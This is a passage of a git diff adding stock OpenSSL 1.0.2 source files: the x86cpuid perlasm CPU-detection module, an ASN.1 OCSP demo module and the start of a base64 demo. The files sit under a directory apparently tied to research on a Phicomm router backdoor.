+	loop	.Loop_rdseed
+.Lbreak_rdseed:
+	cmp	\$0,%rax
+	cmove	%rcx,%rax
+	ret
+.size	OPENSSL_ia32_rdseed,.-OPENSSL_ia32_rdseed
+___
+
+close STDOUT;	# flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86cpuid.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86cpuid.pl
new file mode 100644
index 0000000..e95f627
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x86cpuid.pl
@@ -0,0 +1,387 @@
+#!/usr/bin/env perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC, "${dir}perlasm", "perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"x86cpuid");
+
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+&function_begin("OPENSSL_ia32_cpuid");
+	&xor	("edx","edx");
+	&pushf	();
+	&pop	("eax");
+	&mov	("ecx","eax");
+	&xor	("eax",1<<21);
+	&push	("eax");
+	&popf	();
+	&pushf	();
+	&pop	("eax");
+	&xor	("ecx","eax");
+	&xor	("eax","eax");
+	&bt	("ecx",21);
+	&jnc	(&label("nocpuid"));
+	&mov	("esi",&wparam(0));
+	&mov	(&DWP(8,"esi"),"eax");	# clear 3rd word
+	&cpuid	();
+	&mov	("edi","eax");		# max value for standard query level
+
+	&xor	("eax","eax");
+	&cmp	("ebx",0x756e6547);	# "Genu"
+	&setne	(&LB("eax"));
+	&mov	("ebp","eax");
+	&cmp	("edx",0x49656e69);	# "ineI"
+	&setne	(&LB("eax"));
+	&or	("ebp","eax");
+	&cmp	("ecx",0x6c65746e);	# "ntel"
+	&setne	(&LB("eax"));
+	&or	("ebp","eax");		# 0 indicates Intel CPU
+	&jz	(&label("intel"));
+
+	&cmp	("ebx",0x68747541);	# "Auth"
+	&setne	(&LB("eax"));
+	&mov	("esi","eax");
+	&cmp	("edx",0x69746E65);	# "enti"
+	&setne	(&LB("eax"));
+	&or	("esi","eax");
+	&cmp	("ecx",0x444D4163);	# "cAMD"
+	&setne	(&LB("eax"));
+	&or	("esi","eax");		# 0 indicates AMD CPU
+	&jnz	(&label("intel"));
+
+	# AMD specific
+	&mov	("eax",0x80000000);
+	&cpuid	();
+	&cmp	("eax",0x80000001);
+	&jb	(&label("intel"));
+	&mov	("esi","eax");
+	&mov	("eax",0x80000001);
+	&cpuid	();
+	&or	("ebp","ecx");
+	&and	("ebp",1<<11|1);	# isolate XOP bit
+	&cmp	("esi",0x80000008);
+	&jb	(&label("intel"));
+
+	&mov	("eax",0x80000008);
+	&cpuid	();
+	&movz	("esi",&LB("ecx"));	# number of cores - 1
+	&inc	("esi");		# number of cores
+
+	&mov	("eax",1);
+	&xor	("ecx","ecx");
+	&cpuid	();
+	&bt	("edx",28);
+	&jnc	(&label("generic"));
+	&shr	("ebx",16);
+	&and	("ebx",0xff);
+	&cmp	("ebx","esi");
+	&ja	(&label("generic"));
+	&and	("edx",0xefffffff);	# clear hyper-threading bit
+	&jmp	(&label("generic"));
+	
+&set_label("intel");
+	&cmp	("edi",7);
+	&jb	(&label("cacheinfo"));
+
+	&mov	("esi",&wparam(0));
+	&mov	("eax",7);
+	&xor	("ecx","ecx");
+	&cpuid	();
+	&mov	(&DWP(8,"esi"),"ebx");
+
+&set_label("cacheinfo");
+	&cmp	("edi",4);
+	&mov	("edi",-1);
+	&jb	(&label("nocacheinfo"));
+
+	&mov	("eax",4);
+	&mov	("ecx",0);		# query L1D
+	&cpuid	();
+	&mov	("edi","eax");
+	&shr	("edi",14);
+	&and	("edi",0xfff);		# number of cores -1 per L1D
+
+&set_label("nocacheinfo");
+	&mov	("eax",1);
+	&xor	("ecx","ecx");
+	&cpuid	();
+	&and	("edx",0xbfefffff);	# force reserved bits #20, #30 to 0
+	&cmp	("ebp",0);
+	&jne	(&label("notintel"));
+	&or	("edx",1<<30);		# set reserved bit#30 on Intel CPUs
+	&and	(&HB("eax"),15);	# familiy ID
+	&cmp	(&HB("eax"),15);	# P4?
+	&jne	(&label("notintel"));
+	&or	("edx",1<<20);		# set reserved bit#20 to engage RC4_CHAR
+&set_label("notintel");
+	&bt	("edx",28);		# test hyper-threading bit
+	&jnc	(&label("generic"));
+	&and	("edx",0xefffffff);
+	&cmp	("edi",0);
+	&je	(&label("generic"));
+
+	&or	("edx",0x10000000);
+	&shr	("ebx",16);
+	&cmp	(&LB("ebx"),1);
+	&ja	(&label("generic"));
+	&and	("edx",0xefffffff);	# clear hyper-threading bit if not
+
+&set_label("generic");
+	&and	("ebp",1<<11);		# isolate AMD XOP flag
+	&and	("ecx",0xfffff7ff);	# force 11th bit to 0
+	&mov	("esi","edx");
+	&or	("ebp","ecx");		# merge AMD XOP flag
+
+	&bt	("ecx",27);		# check OSXSAVE bit
+	&jnc	(&label("clear_avx"));
+	&xor	("ecx","ecx");
+	&data_byte(0x0f,0x01,0xd0);	# xgetbv
+	&and	("eax",6);
+	&cmp	("eax",6);
+	&je	(&label("done"));
+	&cmp	("eax",2);
+	&je	(&label("clear_avx"));
+&set_label("clear_xmm");
+	&and	("ebp",0xfdfffffd);	# clear AESNI and PCLMULQDQ bits
+	&and	("esi",0xfeffffff);	# clear FXSR
+&set_label("clear_avx");
+	&and	("ebp",0xefffe7ff);	# clear AVX, FMA and AMD XOP bits
+	&mov	("edi",&wparam(0));
+	&and	(&DWP(8,"edi"),0xffffffdf);	# clear AVX2
+&set_label("done");
+	&mov	("eax","esi");
+	&mov	("edx","ebp");
+&set_label("nocpuid");
+&function_end("OPENSSL_ia32_cpuid");
+
+&external_label("OPENSSL_ia32cap_P");
+
+&function_begin_B("OPENSSL_rdtsc","EXTRN\t_OPENSSL_ia32cap_P:DWORD");
+	&xor	("eax","eax");
+	&xor	("edx","edx");
+	&picmeup("ecx","OPENSSL_ia32cap_P");
+	&bt	(&DWP(0,"ecx"),4);
+	&jnc	(&label("notsc"));
+	&rdtsc	();
+&set_label("notsc");
+	&ret	();
+&function_end_B("OPENSSL_rdtsc");
+
+# This works in Ring 0 only [read DJGPP+MS-DOS+privileged DPMI host],
+# but it's safe to call it on any [supported] 32-bit platform...
+# Just check for [non-]zero return value...
+&function_begin_B("OPENSSL_instrument_halt","EXTRN\t_OPENSSL_ia32cap_P:DWORD");
+	&picmeup("ecx","OPENSSL_ia32cap_P");
+	&bt	(&DWP(0,"ecx"),4);
+	&jnc	(&label("nohalt"));	# no TSC
+
+	&data_word(0x9058900e);		# push %cs; pop %eax
+	&and	("eax",3);
+	&jnz	(&label("nohalt"));	# not enough privileges
+
+	&pushf	();
+	&pop	("eax");
+	&bt	("eax",9);
+	&jnc	(&label("nohalt"));	# interrupts are disabled
+
+	&rdtsc	();
+	&push	("edx");
+	&push	("eax");
+	&halt	();
+	&rdtsc	();
+
+	&sub	("eax",&DWP(0,"esp"));
+	&sbb	("edx",&DWP(4,"esp"));
+	&add	("esp",8);
+	&ret	();
+
+&set_label("nohalt");
+	&xor	("eax","eax");
+	&xor	("edx","edx");
+	&ret	();
+&function_end_B("OPENSSL_instrument_halt");
+
+# Essentially there is only one use for this function. Under DJGPP:
+#
+#	#include <go32.h>
+#	...
+#	i=OPENSSL_far_spin(_dos_ds,0x46c);
+#	...
+# to obtain the number of spins till closest timer interrupt.
+
+&function_begin_B("OPENSSL_far_spin");
+	&pushf	();
+	&pop	("eax");
+	&bt	("eax",9);
+	&jnc	(&label("nospin"));	# interrupts are disabled
+
+	&mov	("eax",&DWP(4,"esp"));
+	&mov	("ecx",&DWP(8,"esp"));
+	&data_word (0x90d88e1e);	# push %ds, mov %eax,%ds
+	&xor	("eax","eax");
+	&mov	("edx",&DWP(0,"ecx"));
+	&jmp	(&label("spin"));
+
+	&align	(16);
+&set_label("spin");
+	&inc	("eax");
+	&cmp	("edx",&DWP(0,"ecx"));
+	&je	(&label("spin"));
+
+	&data_word (0x1f909090);	# pop	%ds
+	&ret	();
+
+&set_label("nospin");
+	&xor	("eax","eax");
+	&xor	("edx","edx");
+	&ret	();
+&function_end_B("OPENSSL_far_spin");
+
+&function_begin_B("OPENSSL_wipe_cpu","EXTRN\t_OPENSSL_ia32cap_P:DWORD");
+	&xor	("eax","eax");
+	&xor	("edx","edx");
+	&picmeup("ecx","OPENSSL_ia32cap_P");
+	&mov	("ecx",&DWP(0,"ecx"));
+	&bt	(&DWP(0,"ecx"),1);
+	&jnc	(&label("no_x87"));
+	if ($sse2) {
+		&and	("ecx",1<<26|1<<24);	# check SSE2 and FXSR bits
+		&cmp	("ecx",1<<26|1<<24);
+		&jne	(&label("no_sse2"));
+		&pxor	("xmm0","xmm0");
+		&pxor	("xmm1","xmm1");
+		&pxor	("xmm2","xmm2");
+		&pxor	("xmm3","xmm3");
+		&pxor	("xmm4","xmm4");
+		&pxor	("xmm5","xmm5");
+		&pxor	("xmm6","xmm6");
+		&pxor	("xmm7","xmm7");
+	&set_label("no_sse2");
+	}
+	# just a bunch of fldz to zap the fp/mm bank followed by finit...
+	&data_word(0xeed9eed9,0xeed9eed9,0xeed9eed9,0xeed9eed9,0x90e3db9b);
+&set_label("no_x87");
+	&lea	("eax",&DWP(4,"esp"));
+	&ret	();
+&function_end_B("OPENSSL_wipe_cpu");
+
+&function_begin_B("OPENSSL_atomic_add");
+	&mov	("edx",&DWP(4,"esp"));	# fetch the pointer, 1st arg
+	&mov	("ecx",&DWP(8,"esp"));	# fetch the increment, 2nd arg
+	&push	("ebx");
+	&nop	();
+	&mov	("eax",&DWP(0,"edx"));
+&set_label("spin");
+	&lea	("ebx",&DWP(0,"eax","ecx"));
+	&nop	();
+	&data_word(0x1ab10ff0);	# lock;	cmpxchg	%ebx,(%edx)	# %eax is envolved and is always reloaded
+	&jne	(&label("spin"));
+	&mov	("eax","ebx");	# OpenSSL expects the new value
+	&pop	("ebx");
+	&ret	();
+&function_end_B("OPENSSL_atomic_add");
+
+# This function can become handy under Win32 in situations when
+# we don't know which calling convention, __stdcall or __cdecl(*),
+# indirect callee is using. In C it can be deployed as
+#
+#ifdef OPENSSL_CPUID_OBJ
+#	type OPENSSL_indirect_call(void *f,...);
+#	...
+#	OPENSSL_indirect_call(func,[up to $max arguments]);
+#endif
+#
+# (*)	it's designed to work even for __fastcall if number of
+#	arguments is 1 or 2!
+&function_begin_B("OPENSSL_indirect_call");
+	{
+	my ($max,$i)=(7,);	# $max has to be chosen as 4*n-1
+				# in order to preserve eventual
+				# stack alignment
+	&push	("ebp");
+	&mov	("ebp","esp");
+	&sub	("esp",$max*4);
+	&mov	("ecx",&DWP(12,"ebp"));
+	&mov	(&DWP(0,"esp"),"ecx");
+	&mov	("edx",&DWP(16,"ebp"));
+	&mov	(&DWP(4,"esp"),"edx");
+	for($i=2;$i<$max;$i++)
+		{
+		# Some copies will be redundant/bogus...
+		&mov	("eax",&DWP(12+$i*4,"ebp"));
+		&mov	(&DWP(0+$i*4,"esp"),"eax");
+		}
+	&call_ptr	(&DWP(8,"ebp"));# make the call...
+	&mov	("esp","ebp");	# ... and just restore the stack pointer
+				# without paying attention to what we called,
+				# (__cdecl *func) or (__stdcall *one).
+	&pop	("ebp");
+	&ret	();
+	}
+&function_end_B("OPENSSL_indirect_call");
+
+&function_begin_B("OPENSSL_cleanse");
+	&mov	("edx",&wparam(0));
+	&mov	("ecx",&wparam(1));
+	&xor	("eax","eax");
+	&cmp	("ecx",7);
+	&jae	(&label("lot"));
+	&cmp	("ecx",0);
+	&je	(&label("ret"));
+&set_label("little");
+	&mov	(&BP(0,"edx"),"al");
+	&sub	("ecx",1);
+	&lea	("edx",&DWP(1,"edx"));
+	&jnz	(&label("little"));
+&set_label("ret");
+	&ret	();
+
+&set_label("lot",16);
+	&test	("edx",3);
+	&jz	(&label("aligned"));
+	&mov	(&BP(0,"edx"),"al");
+	&lea	("ecx",&DWP(-1,"ecx"));
+	&lea	("edx",&DWP(1,"edx"));
+	&jmp	(&label("lot"));
+&set_label("aligned");
+	&mov	(&DWP(0,"edx"),"eax");
+	&lea	("ecx",&DWP(-4,"ecx"));
+	&test	("ecx",-4);
+	&lea	("edx",&DWP(4,"edx"));
+	&jnz	(&label("aligned"));
+	&cmp	("ecx",0);
+	&jne	(&label("little"));
+	&ret	();
+&function_end_B("OPENSSL_cleanse");
+
+&function_begin_B("OPENSSL_ia32_rdrand");
+	&mov	("ecx",8);
+&set_label("loop");
+	&rdrand	("eax");
+	&jc	(&label("break"));
+	&loop	(&label("loop"));
+&set_label("break");
+	&cmp	("eax",0);
+	&cmove	("eax","ecx");
+	&ret	();
+&function_end_B("OPENSSL_ia32_rdrand");
+
+&function_begin_B("OPENSSL_ia32_rdseed");
+	&mov	("ecx",8);
+&set_label("loop");
+	&rdseed	("eax");
+	&jc	(&label("break"));
+	&loop	(&label("loop"));
+&set_label("break");
+	&cmp	("eax",0);
+	&cmove	("eax","ecx");
+	&ret	();
+&function_end_B("OPENSSL_ia32_rdseed");
+
+&initseg("OPENSSL_cpuid_setup");
+
+&hidden("OPENSSL_cpuid_setup");
+&hidden("OPENSSL_ia32cap_P");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/README
new file mode 100644
index 0000000..d2155ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/README
@@ -0,0 +1,9 @@
+NOTE: Don't expect any of these programs to work with current
+OpenSSL releases, or even with later SSLeay releases.
+
+Original README:
+=============================================================================
+
+Some demo programs sent to me by various people
+
+eric
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/README.ASN1 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/README.ASN1
new file mode 100644
index 0000000..ac497be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/README.ASN1
@@ -0,0 +1,7 @@
+This is a demo of the new ASN1 code. Its an OCSP ASN1 module. Doesn't
+do much yet other than demonstrate what the new ASN1 modules might look
+like.
+
+It wont even compile yet: the new code isn't in place.
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/ocsp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/ocsp.c
new file mode 100644
index 0000000..db40719
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/asn1/ocsp.c
@@ -0,0 +1,361 @@
+/* ocsp.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+/*-
+   Example of new ASN1 code, OCSP request
+
+        OCSPRequest     ::=     SEQUENCE {
+            tbsRequest                  TBSRequest,
+            optionalSignature   [0]     EXPLICIT Signature OPTIONAL }
+
+        TBSRequest      ::=     SEQUENCE {
+            version             [0] EXPLICIT Version DEFAULT v1,
+            requestorName       [1] EXPLICIT GeneralName OPTIONAL,
+            requestList             SEQUENCE OF Request,
+            requestExtensions   [2] EXPLICIT Extensions OPTIONAL }
+
+        Signature       ::=     SEQUENCE {
+            signatureAlgorithm   AlgorithmIdentifier,
+            signature            BIT STRING,
+            certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
+
+        Version  ::=  INTEGER  {  v1(0) }
+
+        Request ::=     SEQUENCE {
+            reqCert                    CertID,
+            singleRequestExtensions    [0] EXPLICIT Extensions OPTIONAL }
+
+        CertID ::= SEQUENCE {
+            hashAlgorithm            AlgorithmIdentifier,
+            issuerNameHash     OCTET STRING, -- Hash of Issuer's DN
+            issuerKeyHash      OCTET STRING, -- Hash of Issuers public key
+            serialNumber       CertificateSerialNumber }
+
+        OCSPResponse ::= SEQUENCE {
+           responseStatus         OCSPResponseStatus,
+           responseBytes          [0] EXPLICIT ResponseBytes OPTIONAL }
+
+        OCSPResponseStatus ::= ENUMERATED {
+            successful            (0),      --Response has valid confirmations
+            malformedRequest      (1),      --Illegal confirmation request
+            internalError         (2),      --Internal error in issuer
+            tryLater              (3),      --Try again later
+                                            --(4) is not used
+            sigRequired           (5),      --Must sign the request
+            unauthorized          (6)       --Request unauthorized
+        }
+
+        ResponseBytes ::=       SEQUENCE {
+            responseType   OBJECT IDENTIFIER,
+            response       OCTET STRING }
+
+        BasicOCSPResponse       ::= SEQUENCE {
+           tbsResponseData      ResponseData,
+           signatureAlgorithm   AlgorithmIdentifier,
+           signature            BIT STRING,
+           certs                [0] EXPLICIT SEQUENCE OF Certificate OPTIONAL }
+
+        ResponseData ::= SEQUENCE {
+           version              [0] EXPLICIT Version DEFAULT v1,
+           responderID              ResponderID,
+           producedAt               GeneralizedTime,
+           responses                SEQUENCE OF SingleResponse,
+           responseExtensions   [1] EXPLICIT Extensions OPTIONAL }
+
+        ResponderID ::= CHOICE {
+           byName   [1] Name,    --EXPLICIT
+           byKey    [2] KeyHash }
+
+        KeyHash ::= OCTET STRING --SHA-1 hash of responder's public key
+                                 --(excluding the tag and length fields)
+
+        SingleResponse ::= SEQUENCE {
+           certID                       CertID,
+           certStatus                   CertStatus,
+           thisUpdate                   GeneralizedTime,
+           nextUpdate           [0]     EXPLICIT GeneralizedTime OPTIONAL,
+           singleExtensions     [1]     EXPLICIT Extensions OPTIONAL }
+
+        CertStatus ::= CHOICE {
+            good                [0]     IMPLICIT NULL,
+            revoked             [1]     IMPLICIT RevokedInfo,
+            unknown             [2]     IMPLICIT UnknownInfo }
+
+        RevokedInfo ::= SEQUENCE {
+            revocationTime              GeneralizedTime,
+            revocationReason    [0]     EXPLICIT CRLReason OPTIONAL }
+
+        UnknownInfo ::= NULL -- this can be replaced with an enumeration
+
+        ArchiveCutoff ::= GeneralizedTime
+
+        AcceptableResponses ::= SEQUENCE OF OBJECT IDENTIFIER
+
+        ServiceLocator ::= SEQUENCE {
+            issuer    Name,
+            locator   AuthorityInfoAccessSyntax }
+
+        -- Object Identifiers
+
+        id-kp-OCSPSigning            OBJECT IDENTIFIER ::= { id-kp 9 }
+        id-pkix-ocsp                 OBJECT IDENTIFIER ::= { id-ad-ocsp }
+        id-pkix-ocsp-basic           OBJECT IDENTIFIER ::= { id-pkix-ocsp 1 }
+        id-pkix-ocsp-nonce           OBJECT IDENTIFIER ::= { id-pkix-ocsp 2 }
+        id-pkix-ocsp-crl             OBJECT IDENTIFIER ::= { id-pkix-ocsp 3 }
+        id-pkix-ocsp-response        OBJECT IDENTIFIER ::= { id-pkix-ocsp 4 }
+        id-pkix-ocsp-nocheck         OBJECT IDENTIFIER ::= { id-pkix-ocsp 5 }
+        id-pkix-ocsp-archive-cutoff  OBJECT IDENTIFIER ::= { id-pkix-ocsp 6 }
+        id-pkix-ocsp-service-locator OBJECT IDENTIFIER ::= { id-pkix-ocsp 7 }
+
+*/
+
+/* Request Structures */
+
+DECLARE_STACK_OF(Request)
+
+typedef struct {
+    ASN1_INTEGER *version;
+    GENERAL_NAME *requestorName;
+    STACK_OF(Request) *requestList;
+    STACK_OF(X509_EXTENSION) *requestExtensions;
+} TBSRequest;
+
+typedef struct {
+    X509_ALGOR *signatureAlgorithm;
+    ASN1_BIT_STRING *signature;
+    STACK_OF(X509) *certs;
+} Signature;
+
+typedef struct {
+    TBSRequest *tbsRequest;
+    Signature *optionalSignature;
+} OCSPRequest;
+
+typedef struct {
+    X509_ALGOR *hashAlgorithm;
+    ASN1_OCTET_STRING *issuerNameHash;
+    ASN1_OCTET_STRING *issuerKeyHash;
+    ASN1_INTEGER *certificateSerialNumber;
+} CertID;
+
+typedef struct {
+    CertID *reqCert;
+    STACK_OF(X509_EXTENSION) *singleRequestExtensions;
+} Request;
+
+/* Response structures */
+
+typedef struct {
+    ASN1_OBJECT *responseType;
+    ASN1_OCTET_STRING *response;
+} ResponseBytes;
+
+typedef struct {
+    ASN1_ENUMERATED *responseStatus;
+    ResponseBytes *responseBytes;
+} OCSPResponse;
+
+typedef struct {
+    int type;
+    union {
+        X509_NAME *byName;
+        ASN1_OCTET_STRING *byKey;
+    } d;
+} ResponderID;
+
+typedef struct {
+    ASN1_INTEGER *version;
+    ResponderID *responderID;
+    ASN1_GENERALIZEDTIME *producedAt;
+    STACK_OF(SingleResponse) *responses;
+    STACK_OF(X509_EXTENSION) *responseExtensions;
+} ResponseData;
+
+typedef struct {
+    ResponseData *tbsResponseData;
+    X509_ALGOR *signatureAlgorithm;
+    ASN1_BIT_STRING *signature;
+    STACK_OF(X509) *certs;
+} BasicOCSPResponse;
+
+typedef struct {
+    ASN1_GENERALIZEDTIME *revocationTime;
+    ASN1_ENUMERATED *revocationReason;
+} RevokedInfo;
+
+typedef struct {
+    int type;
+    union {
+        ASN1_NULL *good;
+        RevokedInfo *revoked;
+        ASN1_NULL *unknown;
+    } d;
+} CertStatus;
+
+typedef struct {
+    CertID *certID;
+    CertStatus *certStatus;
+    ASN1_GENERALIZEDTIME *thisUpdate;
+    ASN1_GENERALIZEDTIME *nextUpdate;
+    STACK_OF(X509_EXTENSION) *singleExtensions;
+} SingleResponse;
+
+typedef struct {
+    X509_NAME *issuer;
+    STACK_OF(ACCESS_DESCRIPTION) *locator;
+} ServiceLocator;
+
+/* Now the ASN1 templates */
+
+IMPLEMENT_COMPAT_ASN1(X509);
+IMPLEMENT_COMPAT_ASN1(X509_ALGOR);
+// IMPLEMENT_COMPAT_ASN1(X509_EXTENSION);
+IMPLEMENT_COMPAT_ASN1(GENERAL_NAME);
+IMPLEMENT_COMPAT_ASN1(X509_NAME);
+
+ASN1_SEQUENCE(X509_EXTENSION) = {
+        ASN1_SIMPLE(X509_EXTENSION, object, ASN1_OBJECT),
+        ASN1_OPT(X509_EXTENSION, critical, ASN1_BOOLEAN),
+        ASN1_SIMPLE(X509_EXTENSION, value, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(X509_EXTENSION);
+
+
+ASN1_SEQUENCE(Signature) = {
+        ASN1_SIMPLE(Signature, signatureAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(Signature, signature, ASN1_BIT_STRING),
+        ASN1_SEQUENCE_OF(Signature, certs, X509)
+} ASN1_SEQUENCE_END(Signature);
+
+ASN1_SEQUENCE(CertID) = {
+        ASN1_SIMPLE(CertID, hashAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CertID, issuerNameHash, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(CertID, issuerKeyHash, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(CertID, certificateSerialNumber, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(CertID);
+
+ASN1_SEQUENCE(Request) = {
+        ASN1_SIMPLE(Request, reqCert, CertID),
+        ASN1_EXP_SEQUENCE_OF_OPT(Request, singleRequestExtensions, X509_EXTENSION, 0)
+} ASN1_SEQUENCE_END(Request);
+
+ASN1_SEQUENCE(TBSRequest) = {
+        ASN1_EXP_OPT(TBSRequest, version, ASN1_INTEGER, 0),
+        ASN1_EXP_OPT(TBSRequest, requestorName, GENERAL_NAME, 1),
+        ASN1_SEQUENCE_OF(TBSRequest, requestList, Request),
+        ASN1_EXP_SEQUENCE_OF_OPT(TBSRequest, requestExtensions, X509_EXTENSION, 2)
+} ASN1_SEQUENCE_END(TBSRequest);
+
+ASN1_SEQUENCE(OCSPRequest) = {
+        ASN1_SIMPLE(OCSPRequest, tbsRequest, TBSRequest),
+        ASN1_EXP_OPT(OCSPRequest, optionalSignature, Signature, 0)
+} ASN1_SEQUENCE_END(OCSPRequest);
+
+/* Response templates */
+
+ASN1_SEQUENCE(ResponseBytes) = {
+            ASN1_SIMPLE(ResponseBytes, responseType, ASN1_OBJECT),
+            ASN1_SIMPLE(ResponseBytes, response, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(ResponseBytes);
+
+ASN1_SEQUENCE(OCSPResponse) = {
+        ASN1_SIMPLE(OCSPResponse, responseStatus, ASN1_ENUMERATED),
+        ASN1_EXP_OPT(OCSPResponse, responseBytes, ResponseBytes, 0)
+} ASN1_SEQUENCE_END(OCSPResponse);
+
+ASN1_CHOICE(ResponderID) = {
+           ASN1_EXP(ResponderID, d.byName, X509_NAME, 1),
+           ASN1_IMP(ResponderID, d.byKey, ASN1_OCTET_STRING, 2)
+} ASN1_CHOICE_END(ResponderID);
+
+ASN1_SEQUENCE(RevokedInfo) = {
+        ASN1_SIMPLE(RevokedInfo, revocationTime, ASN1_GENERALIZEDTIME),
+        ASN1_EXP_OPT(RevokedInfo, revocationReason, ASN1_ENUMERATED, 0)
+} ASN1_SEQUENCE_END(RevokedInfo);
+
+ASN1_CHOICE(CertStatus) = {
+        ASN1_IMP(CertStatus, d.good, ASN1_NULL, 0),
+        ASN1_IMP(CertStatus, d.revoked, RevokedInfo, 1),
+        ASN1_IMP(CertStatus, d.unknown, ASN1_NULL, 2)
+} ASN1_CHOICE_END(CertStatus);
+
+ASN1_SEQUENCE(SingleResponse) = {
+           ASN1_SIMPLE(SingleResponse, certID, CertID),
+           ASN1_SIMPLE(SingleResponse, certStatus, CertStatus),
+           ASN1_SIMPLE(SingleResponse, thisUpdate, ASN1_GENERALIZEDTIME),
+           ASN1_EXP_OPT(SingleResponse, nextUpdate, ASN1_GENERALIZEDTIME, 0),
+           ASN1_EXP_SEQUENCE_OF_OPT(SingleResponse, singleExtensions, X509_EXTENSION, 1)
+} ASN1_SEQUENCE_END(SingleResponse);
+
+ASN1_SEQUENCE(ResponseData) = {
+           ASN1_EXP_OPT(ResponseData, version, ASN1_INTEGER, 0),
+           ASN1_SIMPLE(ResponseData, responderID, ResponderID),
+           ASN1_SIMPLE(ResponseData, producedAt, ASN1_GENERALIZEDTIME),
+           ASN1_SEQUENCE_OF(ResponseData, responses, SingleResponse),
+           ASN1_EXP_SEQUENCE_OF_OPT(ResponseData, responseExtensions, X509_EXTENSION, 1)
+} ASN1_SEQUENCE_END(ResponseData);
+
+ASN1_SEQUENCE(BasicOCSPResponse) = {
+           ASN1_SIMPLE(BasicOCSPResponse, tbsResponseData, ResponseData),
+           ASN1_SIMPLE(BasicOCSPResponse, signatureAlgorithm, X509_ALGOR),
+           ASN1_SIMPLE(BasicOCSPResponse, signature, ASN1_BIT_STRING),
+           ASN1_EXP_SEQUENCE_OF_OPT(BasicOCSPResponse, certs, X509, 0)
+} ASN1_SEQUENCE_END(BasicOCSPResponse);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.c
new file mode 100644
index 0000000..d8ed2a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/b64.c
@@ -0,0 +1,255 @@
+/* demos/b64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
